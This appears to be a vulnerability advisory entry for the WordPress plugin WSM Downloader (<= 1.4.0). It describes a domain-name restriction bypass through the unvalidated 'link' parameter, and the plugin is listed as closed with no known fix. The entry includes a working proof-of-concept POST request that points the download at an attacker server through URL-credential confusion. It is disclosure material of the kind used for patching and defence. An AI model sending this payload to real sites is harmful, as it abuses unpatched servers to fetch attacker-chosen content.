WordPress Plugin Vulnerabilities
WSM Downloader <= 1.4.0 - Domain Name Restriction Bypass
Description
The plugin allows only specific popular websites to download images/files from, this can be bypassed due to the lack of good "link" parameter validation
Proof of Concept
POST /blog/wp-admin/admin-ajax.php HTTP/1.1 Host: target ... ... ... action=wsmd_user_download_request&link=http://instagram:[email protected]_SERVER/test&requestlink=
Affects Plugins
No known fix - plugin closed
References
Classification
Type
BYPASS
Miscellaneous
Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-07-12 (about 6 months ago)
Added
2022-07-12 (about 6 months ago)
Last Updated
2022-08-22 (about 5 months ago)